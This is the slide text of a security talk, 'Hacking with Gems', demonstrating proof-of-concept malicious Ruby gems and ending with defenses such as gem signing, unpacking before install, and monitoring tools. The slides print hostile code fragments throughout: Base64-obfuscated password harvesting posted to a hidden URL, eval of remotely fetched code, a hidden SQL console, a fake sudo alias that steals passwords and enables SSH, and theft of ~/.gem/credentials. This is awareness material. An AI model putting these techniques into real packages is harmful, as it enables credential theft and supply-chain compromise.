Tweet
Tweet

Slide 1

Slide 1 text

Hacking with Gems Benjamin Smith @benjamin_smith

Slide 2

Slide 2 text

How to punk your friends with gems Benjamin Smith @benjamin_smith

Slide 3

Slide 3 text

How-to get rich quick and (maybe) not go to jail! Benjamin Smith @benjamin_smith

Slide 4

Slide 4 text

Four reasons you should NOT trust Benjamin Smith @benjamin_smith

Slide 5

Slide 5 text

No content

Slide 6

Slide 6 text

who i am

Slide 7

Slide 7 text

who i am

Slide 8

Slide 8 text

who i am

Slide 9

Slide 9 text

what i am NOT

Slide 10

Slide 10 text

No content

Slide 11

Slide 11 text

please do not try this at home

Slide 12

Slide 12 text

please do not try this at home

Slide 13

Slide 13 text

No content

Slide 14

Slide 14 text

No content

Slide 15

Slide 15 text

Lawful Evil Lawful Good

Slide 16

Slide 16 text

Lawful Evil Lawful Good

Slide 17

Slide 17 text

Lawful Evil Lawful Good

Slide 18

Slide 18 text

Lawful Evil Lawful Good

Slide 19

Slide 19 text

once upon a time

Slide 20

Slide 20 text

GEM remote: https://rubygems.org/ specs: actionmailer (4.1.4) actionpack (= 4.1.4) actionview (= 4.1.4) mail (~> 2.5.4) actionpack (4.1.4) actionview (= 4.1.4) activesupport (= 4.1.4) rack (~> 1.5.2)

Slide 21

Slide 21 text

what’s the worst that could happen?

Slide 22

Slide 22 text

No content

Slide 23

Slide 23 text

gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 24

Slide 24 text

before... github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 25

Slide 25 text

after! github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 26

Slide 26 text

some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 27

Slide 27 text

... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 28

Slide 28 text

?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 29

Slide 29 text

i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 30

Slide 30 text

i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 31

Slide 31 text

“development.log” ... "user"=>{"email"=>"[email protected]", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 32

Slide 32 text

elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 33

Slide 33 text

profit • Step 1: do something • Step 2: do something else • Step 3: ???? • Step 4: profit

Slide 34

Slide 34 text

profit • Step 1: write a gem that does something • Step 2: • Step 3: • Step 4:

Slide 35

Slide 35 text

profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: • Step 4:

Slide 36

Slide 36 text

profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4:

Slide 37

Slide 37 text

profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit

Slide 38

Slide 38 text

profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country

Slide 39

Slide 39 text

a one way ticket to

Slide 40

Slide 40 text

that was easy. what else can I do?

Slide 41

Slide 41 text

gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector

Slide 42

Slide 42 text

show me the hack Net::HTTP.post_form( #, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V +A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector

Slide 43

Slide 43 text

how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params) self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

Slide 44

Slide 44 text

how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params) self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

Slide 45

Slide 45 text

how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params) self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

Slide 46

Slide 46 text

...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector

Slide 47

Slide 47 text

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

Slide 48

Slide 48 text

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

Slide 49

Slide 49 text

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

Slide 50

Slide 50 text

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

Slide 51

Slide 51 text

/users/sign_in github.com/benjaminleesmith/net_http_detector

Slide 52

Slide 52 text

/users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector

Slide 53

Slide 53 text

hello db access! github.com/benjaminleesmith/net_http_detector

Slide 54

Slide 54 text

SELECT * FROM users; github.com/benjaminleesmith/net_http_detector

Slide 55

Slide 55 text

UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector

Slide 56

Slide 56 text

CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector

Slide 57

Slide 57 text

careful of wolves in sheep’s clothing

Slide 58

Slide 58 text

profit • Step 1: • Step 2: • Step 3: • Step 4: • Step 5:

Slide 59

Slide 59 text

profit • Step 1: write a gem that does something • Step 2: • Step 3: • Step 4: • Step 5:

Slide 60

Slide 60 text

profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5:

Slide 61

Slide 61 text

profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5:

Slide 62

Slide 62 text

profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5:

Slide 63

Slide 63 text

profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country

Slide 64

Slide 64 text

i like the beach

Slide 65

Slide 65 text

that was easy. what else can I do?

Slide 66

Slide 66 text

gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s

Slide 67

Slide 67 text

what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1 Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s

Slide 68

Slide 68 text

No content

Slide 69

Slide 69 text

what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s

Slide 70

Slide 70 text

better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0 8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s

Slide 71

Slide 71 text

behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar -zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s

Slide 72

Slide 72 text

what what github.com/benjaminleesmith/better_date_to_s

Slide 73

Slide 73 text

i can haz source github.com/benjaminleesmith/better_date_to_s

Slide 74

Slide 74 text

truth time • this gem doesn't actually work • but it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s

Slide 75

Slide 75 text

so much code so little time • Step 1: write a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country

Slide 76

Slide 76 text

that was easy hard. what else can I do? (that's easier)

Slide 77

Slide 77 text

gem install bunlder

Slide 78

Slide 78 text

gem install be_truthy github.com/benjaminleesmith/be_truthy

Slide 79

Slide 79 text

what it does > true.should be_true > User.new.should be_true > User.new.should be_truthy github.com/benjaminleesmith/be_truthy

Slide 80

Slide 80 text

what it ACTUALLY does github.com/benjaminleesmith/be_truthy

Slide 81

Slide 81 text

github.com/benjaminleesmith/be_truthy

Slide 82

Slide 82 text

file tree looks ok github.com/benjaminleesmith/be_truthy

Slide 83

Slide 83 text

source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy

Slide 84

Slide 84 text

but what was this? github.com/benjaminleesmith/be_truthy

Slide 85

Slide 85 text

I see no C github.com/benjaminleesmith/be_truthy

Slide 86

Slide 86 text

run the what file? Gem::Specification.new do |gem| ... gem.extensions = ["Rakefile"] ... end github.com/benjaminleesmith/be_truthy

Slide 87

Slide 87 text

there is no Rakefile github.com/benjaminleesmith/be_truthy

Slide 88

Slide 88 text

the real file tree github.com/benjaminleesmith/be_truthy

Slide 89

Slide 89 text

the real file tree github.com/benjaminleesmith/be_truthy

Slide 90

Slide 90 text

what does the Rakefile do? github.com/benjaminleesmith/be_truthy

Slide 91

Slide 91 text

sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy

Slide 92

Slide 92 text

File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy

Slide 93

Slide 93 text

FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy

Slide 94

Slide 94 text

what does "sudo" do now? github.com/benjaminleesmith/be_truthy

Slide 95

Slide 95 text

print "WARNING: Improper use of the sudo command ..." system "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

Slide 96

Slide 96 text

print "WARNING: Improper use of the sudo command ..." system "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

Slide 97

Slide 97 text

print "WARNING: Improper use of the sudo command ..." system "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

Slide 98

Slide 98 text

print "WARNING: Improper use of the sudo command ..." system "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

Slide 99

Slide 99 text

echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy

Slide 100

Slide 100 text

/usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl . -passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy

Slide 101

Slide 101 text

Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy

Slide 102

Slide 102 text

ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy

Slide 103

Slide 103 text

take away: don't install ben's gems

Slide 104

Slide 104 text

No content

Slide 105

Slide 105 text

how could I get you to install my gems?

Slide 106

Slide 106 text

what gems are trustworthy?

Slide 107

Slide 107 text

how can I add my code to already trusted gems?

Slide 108

Slide 108 text

back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy

Slide 109

Slide 109 text

gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

Slide 110

Slide 110 text

gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

Slide 111

Slide 111 text

gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

Slide 112

Slide 112 text

now I own your gems github.com/benjaminleesmith/be_truthy

Slide 113

Slide 113 text

> git clone your-gem-repo ...add a little code... > rake build > gem push your-gem github.com/benjaminleesmith/be_truthy

Slide 114

Slide 114 text

do people trust your gems?

Slide 115

Slide 115 text

do people who install your gems have trustworthy gems?

Slide 116

Slide 116 text

No content

Slide 117

Slide 117 text

there’s still one problem

Slide 118

Slide 118 text

bootstrapping

Slide 119

Slide 119 text

being popular sucks

Slide 120

Slide 120 text

conferences

Slide 121

Slide 121 text

social engineering

Slide 122

Slide 122 text

No content

Slide 123

Slide 123 text

No content

Slide 124

Slide 124 text

No content

Slide 125

Slide 125 text

so what happens now?

Slide 126

Slide 126 text

ruby gems goes down

Slide 127

Slide 127 text

heroku deploys go down

Slide 128

Slide 128 text

i go to the beach

Slide 129

Slide 129 text

ruby gems goes down

Slide 130

Slide 130 text

heroku deploys go down

Slide 131

Slide 131 text

recovery

Slide 132

Slide 132 text

so what now?

Slide 133

Slide 133 text

gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 134

Slide 134 text

Little Snitch obdev.at/products/littlesnitch/index.html

Slide 135

Slide 135 text

gem install be_truthy github.com/benjaminleesmith/be_truthy

Slide 136

Slide 136 text

fseventer fernlightning.com/doku.php?id=software:fseventer:start

Slide 137

Slide 137 text

don’t “gem install” from strangers

Slide 138

Slide 138 text

gem fetch vs gem install > gem fetch be_truthy > gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy

Slide 139

Slide 139 text

No content

Slide 140

Slide 140 text

No content

Slide 141

Slide 141 text

curl -sSL https://get.rvm.io | bash

Slide 142

Slide 142 text

gem install rails -P HighSecurity

Slide 143

Slide 143 text

> gem install rails -P HighSecurity Fetching: i18n-0.6.11.gem (100%) ERROR: While executing gem ... (Gem::Security::Exception) unsigned gems are not allowed by the High Security policy

Slide 144

Slide 144 text

gem cert --build

Slide 145

Slide 145 text

https://www.rubygems-openpgp-ca.org/ https://github.com/rubygems-trust http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-1.html http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-2.html

Slide 146

Slide 146 text

sandboxing

Slide 147

Slide 147 text

github.com/rubygems/rubygems

Slide 148

Slide 148 text

tools to detect malicious code

Slide 149

Slide 149 text

private gem repos

Slide 150

Slide 150 text

do not try this at home

Slide 151

Slide 151 text

don't install gems you don't need to

Slide 152

Slide 152 text

pay attention to what your gems do

Slide 153

Slide 153 text

monitor your system

Slide 154

Slide 154 text

read the source

Slide 155

Slide 155 text

gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary

Slide 156

Slide 156 text

on install github.com/benjaminleesmith/coal-mine-canary

Slide 157

Slide 157 text

the results github.com/benjaminleesmith/coal-mine-canary

Slide 158

Slide 158 text

thank you!

Slide 159

Slide 159 text

questions? ideas? @benjamin_smith https://github.com/benjaminleesmith

Slide 160

Slide 160 text

questions? ideas? @benjamin_smith https://github.com/benjaminleesmith

Slide 161

Slide 161 text

questions? ideas? @benjamin_smith https://github.com/benjaminleesmith